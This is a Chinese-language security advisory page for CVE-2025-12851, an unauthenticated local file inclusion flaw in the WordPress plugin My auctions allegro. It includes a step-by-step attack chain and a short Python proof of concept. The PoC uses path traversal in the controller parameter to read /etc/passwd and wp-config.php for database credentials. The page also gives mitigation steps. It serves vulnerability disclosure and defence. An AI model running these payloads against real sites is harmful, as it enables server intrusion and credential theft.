IPBUF安全漏洞报告
English
CVE-2025-12851 CVSS 8.1 高危

CVE-2025-12851 WordPress My auctions allegro插件本地文件包含漏洞

披露日期: 2025-12-05

漏洞信息

漏洞编号
CVE-2025-12851
漏洞类型
本地文件包含(LFI)
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
My auctions allegro plugin for WordPress

相关标签

本地文件包含LFIWordPress插件远程代码执行CVE-2025-12851My auctions allegro高危漏洞无需认证路径遍历

漏洞概述

WordPress插件My auctions allegro存在严重的本地文件包含漏洞。攻击者可通过构造恶意的controller参数,未经身份验证即可包含服务器上的任意文件,进而执行任意PHP代码。该漏洞影响所有版本直至3.6.32,CVSS评分高达8.1,属于高危漏洞。攻击者可利用此漏洞绕过访问控制、读取敏感配置文件、获取数据库凭证,甚至完全控制服务器。由于无需认证即可利用,且WordPress使用广泛,该漏洞对互联网安全构成重大威胁。

技术细节

漏洞存在于My auctions allegro插件的controller参数处理逻辑中。插件在处理请求时,直接将用户可控的controller参数传递给PHP的include/require等文件包含函数,未进行充分的输入验证和路径安全检查。攻击者可通过构造包含路径遍历字符(如../)的controller参数值,包含服务器上的任意文件。当包含的文件为PHP脚本时,其中的代码将被服务器执行。典型的利用方式是先通过文件上传功能上传包含恶意PHP代码的图像文件,然后通过LFI漏洞包含该文件,从而实现远程代码执行。攻击复杂度较高(AC:H),需要攻击者具备一定的技术能力来构造精确的路径和利用链。

攻击链分析

STEP 1
步骤1
攻击者识别目标WordPress网站并确认安装了My auctions allegro插件
STEP 2
步骤2
构造包含路径遍历序列的controller参数,如../../../etc/passwd
STEP 3
步骤3
发送恶意请求触发文件包含漏洞,读取服务器敏感文件
STEP 4
步骤4
通过文件上传功能上传包含恶意PHP代码的图像文件
STEP 5
步骤5
利用LFI漏洞包含上传的恶意文件,在服务器上执行任意PHP代码
STEP 6
步骤6
获取服务器完全控制权,可执行命令、窃取数据或安装后门

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-12851 LFI PoC import requests target = "http://target-wordpress-site.com" plugin_path = "/wp-content/plugins/my-auctions-allegro/" # Basic LFI test - read /etc/passwd lfi_payload = "../../../../../../etc/passwd" params = {"controller": lfi_payload} response = requests.get(f"{target}{plugin_path}", params=params) print(f"Status: {response.status_code}") print(f"Content preview: {response.text[:500]}") # Read wp-config.php for database credentials config_payload = "../../../../../../wp-config.php" params = {"controller": config_payload} response = requests.get(f"{target}{plugin_path}", params=params) print("\nwp-config.php content:") print(response.text[:1000])

影响范围

My auctions allegro plugin for WordPress <= 3.6.32

防御指南

临时缓解措施
立即将My auctions allegro插件升级至3.6.33或更高版本。如暂时无法升级,可在Web服务器配置中限制对插件目录的访问,或使用WAF拦截包含路径遍历字符的可疑请求。同时确保网站目录下的文件上传功能进行了严格的文件类型和内容验证。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表